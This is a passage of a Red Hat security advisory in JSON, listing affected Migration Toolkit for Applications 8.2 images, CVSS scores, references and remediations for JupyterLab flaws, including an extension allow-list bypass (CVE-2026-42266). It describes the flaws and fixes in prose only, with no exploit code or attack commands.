"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Jupyter Notebook: JupyterLab: @jupyter-notebook/help-extension: @jupyterlab/help-extension: Jupyter Notebook and JupyterLab: Session takeover via stored cross-site scripting"
},
{
"cve": "CVE-2026-42266",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-05-13T16:02:13.807767+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477072"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in JupyterLab, an extensible environment for interactive computing. The PyPI Extension Manager, responsible for installing extensions, failed to properly enforce its allow-list of approved extensions. This vulnerability allowed for the installation of unauthorized extensions from sources outside the default PyPI index. Exploitation of this flaw could lead to arbitrary code execution and significant system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jupyterlab: JupyterLab: Arbitrary code execution due to improper enforcement of extension allow-list",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in JupyterLab, as utilized in Red Hat OpenShift AI and Migration Toolkit for Applications, stems from the PyPI Extension Manager\u0027s failure to enforce its extension allow-list. This enables the installation of unauthorized extensions from external sources, potentially leading to arbitrary code execution and significant system compromise within the JupyterLab environment.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42266"
},
{
"category": "external",
"summary": "RHBZ#2477072",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477072"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42266",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42266"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42266",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42266"
},
{
"category": "external",
"summary": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-37w4-hwhx-4rc4",
"url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-37w4-hwhx-4rc4"
}
],
"release_date": "2026-05-13T15:08:49.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Upgrade JupyterLab to version 4.5.7 or later.\n\nSet the JupyterLab extension manager to read-only mode to prevent users from installing unauthorized extensions. Note: configuring a PyPI proxy with an allow list of packages is not sufficient to protect against this vulnerability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
